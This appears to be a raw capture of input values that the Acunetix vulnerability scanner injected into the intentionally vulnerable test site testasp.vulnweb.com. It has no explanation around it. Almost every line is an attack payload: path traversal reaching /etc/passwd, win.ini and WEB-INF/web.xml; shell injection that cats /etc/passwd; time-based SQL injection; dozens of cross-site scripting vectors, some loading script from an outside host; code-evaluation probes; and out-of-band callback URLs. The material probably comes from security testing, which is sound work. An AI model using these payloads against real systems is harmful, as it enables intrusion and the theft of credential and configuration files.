${100202+99285}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(966006)>

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n933985=v991268

evAlFzNv'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(914522)</sCripT>

)

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

'"()

qxuinO8e')

testasp.vulnweb.com

1&lt

1

!(()&&!|*|*|

/etc/passwd

1

1

yOwGrjy1'))

1

1

<img acu onmouseover=prompt(960605) //>

'

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(996713)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

"

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

................etc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

http://hitqpd7nWtwNs.bxss.me/

comments

1

1

zwAoga5d'

&dir

1

1_mNMik <ScRiPt >prompt(925465)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

E77OBKQl')

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

comments/.

cDPU6CIO'))

1

1

"&dir&"

1

1

WEB-INF/web.xml

'"

1

1

1

1

<!--

1

|dir

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(993360)</ScRiPt>

1

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(997772)</ScRiPt>

1

1

1

1

1

"|dir

1_928360

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2810<s1﹥s2ʺs3ʹuca2810

1

1

1

windowswin.ini

acux4773z1z2abcxuca4773

1

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918786)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<script>prompt(932430)</script>

1

1

1<ScRiPt >prompt(957615)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985646></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(979641)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(946954)">

1

WEB-INF/web.xml

response.write(9022876*9943944)

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977012)"></g></svg>

1

1

1

1<div style=width:expression(prompt(954946))>

1

'+response.write(9022876*9943944)+'

&cat /etc/passwd&

1

1

1

1<iframe src='data:text/html

1

"+response.write(9022876*9943944)+"

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(973773)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967420)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976545)>

-1

1

1

`cat /etc/passwd`

${100283+99443}

1

1

1<img/src=">" onerror=alert(992221)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(902623)</sCripT>

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1&n985961=v933501

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

lH284Hdd'

1&lt

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

.\./.\./.\./.\./.\./.\./etc/passwd

1

zmHDDtef')

<img acu onmouseover=prompt(986205) //>

testasp.vulnweb.com

1

!(()&&!|*|*|

'"()

'

'

caJl0mCG'))

/etc/passwd

1

1<input autofocus onfocus=prompt(958930)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

"

1

"

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitXh9xhCfaIZ.bxss.me/

&dir

1

-1))

1_3mE7E <ScRiPt >prompt(990573)</ScRiPt>

acunetix_wvs_invalid_filename

1

................etc/passwd

1

1

'&dir&'

1

ho5lst9k'

1

comments

1

1

http://www.acunetix.tst

QqiRh9n3')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

comments

TPu0QczG'))

file:///etc/passwd

1

1

1

1

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1'"()&%<ScRiPt >prompt(927039)</ScRiPt>

1

'"

1

'|dir

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(911945)</ScRiPt>

"|dir

1

1

<!--

1

WEB-INF\web.xml

1_918698

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu8902<s1﹥s2ʺs3ʹuca8902

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8811z1z2abcxuca8811

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(939159)</ScRiPt>

1

1

windowswin.ini

1<script>prompt(919042)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(913980)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959645></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(939170)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(934385)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935524)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(940725))>

response.write(9840023*9655018)

1

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9840023*9655018)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<body onload=prompt(984318)>

1

../../../../../../../../../../etc/passwd

"+response.write(9840023*9655018)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912387)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(942197)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

${100464+99255}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(929018)>

-1

1

`cat /etc/passwd`

1

1

1

1&n977913=v906407

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(993991)</sCripT>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

)

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

khzyW08b'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<img acu onmouseover=prompt(968398) //>

1

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

1

cPWFPCC3')

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(972791)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

UYYhBbm3'))

1

1

<a href='http://www.acunetix.com'>website security</a>

"

-1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitnVrNxNDQDH.bxss.me/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_1hIhX <ScRiPt >prompt(932468)</ScRiPt>

-1))

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

................etc/passwd

1

1dPpnhS8'

1

comments

1

&dir

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

EMM3rKJp')

comments

'"

'&dir&'

1

1

1

file:///etc/passwd

1

1

1

TRStOtCz'))

comments/.

<!--

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(944143)</ScRiPt>

1

1

1

|dir

1

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(983065)</ScRiPt>

1

1

'|dir

1

WEB-INF\web.xml

1_908486

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

acu4027<s1﹥s2ʺs3ʹuca4027

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux7126z1z2abcxuca7126

windowswin.ini

1

1

1<ScRiPt >prompt(982591)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(971487)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(974124)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992466></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(950961)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9841432*9878428)

1<video><source onerror="javascript:prompt(965944)">

1

1

1

'+response.write(9841432*9878428)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936366)"></g></svg>

WEB-INF/web.xml

1

"+response.write(9841432*9878428)+"

1

1

1<div style=width:expression(prompt(913496))>

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(995039)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954045)>

1

${99610+100133}

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1)

1<img src=xyz OnErRor=prompt(974851)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1&n960142=v983736

1<img/src=">" onerror=alert(906573)>

1

)

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

9rSpEbLv'

1<ScRiPt%20>prompt(975395)</sCripT>

1

!(()&&!|*|*|

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

I2QotUYh')

^(#$!@#$)(()))******

1&lt

1

1

testasp.vulnweb.com

"|"ld

qnzxJ6Cz'))

.\./.\./.\./.\./.\./.\./etc/passwd

1

<img acu onmouseover=prompt(961974) //>

'"()

1

'

1

1

-1

1<input autofocus onfocus=prompt(955340)>

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

'

1

-1)

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

http://hittGNY0kseGk.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1_0cupQ <ScRiPt >prompt(991950)</ScRiPt>

Vum1wxpV'

1

1

................etc/passwd

1

&dir

1

QXebaHpv')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

1

'&dir&'

1

A8AfYItT'))

comments

1

<!--

file:///etc/passwd

1

1

comments/.

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1'"()&%<ScRiPt >prompt(906779)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(922405)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

'|dir

1_929579

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu2907<s1﹥s2ʺs3ʹuca2907

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6637z1z2abcxuca6637

1

1

windowswin.ini

1

1<ScRiPt >prompt(936602)</ScRiPt>

1

1<script>prompt(950205)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(998714)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996397></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(925575)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(930598)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933745)"></g></svg>

1

1

response.write(9328926*9626067)

1

1<div style=width:expression(prompt(917124))>

1

1

'+response.write(9328926*9626067)+'

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

"+response.write(9328926*9626067)+"

1<body onload=prompt(993915)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996704)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965852)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

1<img/src=">" onerror=alert(969497)>

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100346+99362}

1

-1)

1<ScRiPt%20>prompt(945150)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n965646=v955426

'|'ld

)

WJHDxJif'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<img acu onmouseover=prompt(983697) //>

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

!(()&&!|*|*|

testasp.vulnweb.com

J981s5W9')

1

'"()

1

1<input autofocus onfocus=prompt(900258)>

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Z5yislNp'))

1

1

<a href='http://www.acunetix.com'>website security</a>

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

-1

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1

http://hithanPo96LBu.bxss.me/

1

1_XodiA <ScRiPt >prompt(976027)</ScRiPt>

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

................etc/passwd

-1))

1

1

1

1

1

&dir

comments

${@print(md5(acunetix_wvs_security_test))}\

vGrM0xku'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

http://www.acunetix.tst

'&dir&'

comments

file:///etc/passwd

1

1

yqMSpLdr')

1

comments/.

'"

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(948641)</ScRiPt>

aWsmlmAa'))

1

<!--

1

|dir

1

1

'"()&%<ScRiPt >prompt(931162)</ScRiPt>

1

WEB-INF/web.xml

1

1

'|dir

1_962076

1

1

WEB-INF\web.xml

1

1

1

"|dir

acu2005<s1﹥s2ʺs3ʹuca2005

1

../../../../../../../../../../windows/win.ini

1

1

acux3839z1z2abcxuca3839

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(902550)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(933712)</script>

1

1

1

windowswin.ini

1<ScRiPt >prompt(952727)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990952></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(901340)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(927226)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961164)"></g></svg>

1

1

1

1<div style=width:expression(prompt(998618))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(982200)>

response.write(9000478*9025825)

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909978)>

'+response.write(9000478*9025825)+'

1

1

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(967432)>

"+response.write(9000478*9025825)+"

1

&cat /etc/passwd&

1

1

1<img/src=">" onerror=alert(941944)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<ScRiPt%20>prompt(936384)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

<img acu onmouseover=prompt(949476) //>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

1<input autofocus onfocus=prompt(932961)>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

${99819+100473}

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n913270=v932139

-1))

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

)

1some_inexistent_file_with_long_name%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1_1IGfE <ScRiPt >prompt(942987)</ScRiPt>

GhWcfE4C'

"|"ld

!(()&&!|*|*|

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

h7uL0q1e')

^(#$!@#$)(()))******

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

testasp.vulnweb.com

KcuzKrBA'))

1

'

1

1

'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

"

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

http://hitdp10UoPKvW.bxss.me/

&dir

1

acunetix_wvs_invalid_filename

1

1

1

ACUdF0jb'

1

1

'&dir&'

1

comments

1

wVcqQpdD'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

"&dir&"

1

http://www.acunetix.tst

'"

comments

1

m8ZadxIK'

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

<!--

1'"()&%<ScRiPt >prompt(986698)</ScRiPt>

comments/.

1

DZzoT5Fl')

WEB-INF/web.xml

1

'|dir

1

1

'"()&%<ScRiPt >prompt(946989)</ScRiPt>

1

WEB-INF\web.xml

sJtaLYro'))

1

"|dir

1

1_947227

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu9426<s1﹥s2ʺs3ʹuca9426

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux1752z1z2abcxuca1752

1

1

1

1<ScRiPt >prompt(971145)</ScRiPt>

windowswin.ini

1

1

1

1<script>prompt(947267)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(961017)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977700></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(994842)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(956246)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958358)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(927310))>

1

1

1<iframe src='data:text/html

1

response.write(9967265*9199656)

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(953625)>

'&cat /etc/passwd&'

WEB-INF/web.xml

'+response.write(9967265*9199656)+'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978389)>

WEB-INF\web.xml

"&cat /etc/passwd&"

"+response.write(9967265*9199656)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=xyz OnErRor=prompt(966391)>

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(999417)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(911096)</sCripT>

-1

${99866+100339}

1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(913209) //>

)

1&n940552=v920834

-1))

1

1some_inexistent_file_with_long_name%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

1

1<input autofocus onfocus=prompt(994767)>

gaq5hYcR'

1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

G2tkCREz')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

'

jpCJIMoe'))

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

"

-1

1

1_Oq9PO <ScRiPt >prompt(981601)</ScRiPt>

1

http://hitXVzbrb7Poh.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

||cat /etc/passwd

1

-1)

1

1

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

&dir

1

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

H0gmoQzI'

1

'&dir&'

http://www.acunetix.tst

1

1

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

C7VBEwm1')

"&dir&"

'"

1

comments/.

1'"()&%<ScRiPt >prompt(912257)</ScRiPt>

WEB-INF/web.xml

AmRZjkBC'))

1

<!--

|dir

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(946510)</ScRiPt>

1

1

'|dir

1

1

1_951040

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

acu10303<s1﹥s2ʺs3ʹuca10303

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9186z1z2abcxuca9186

1

1

1

windowswin.ini

1

1<ScRiPt >prompt(996795)</ScRiPt>

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(926370)</script>

1

1

1

1

1<ScRiPt >prompt(985294)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995644></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(946657)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(936869)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901396)"></g></svg>

1

1

response.write(9645728*9291386)

1

1<div style=width:expression(prompt(990757))>

WEB-INF/web.xml

1

'+response.write(9645728*9291386)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

WEB-INF\web.xml

1

"+response.write(9645728*9291386)+"

1

1<body onload=prompt(936909)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

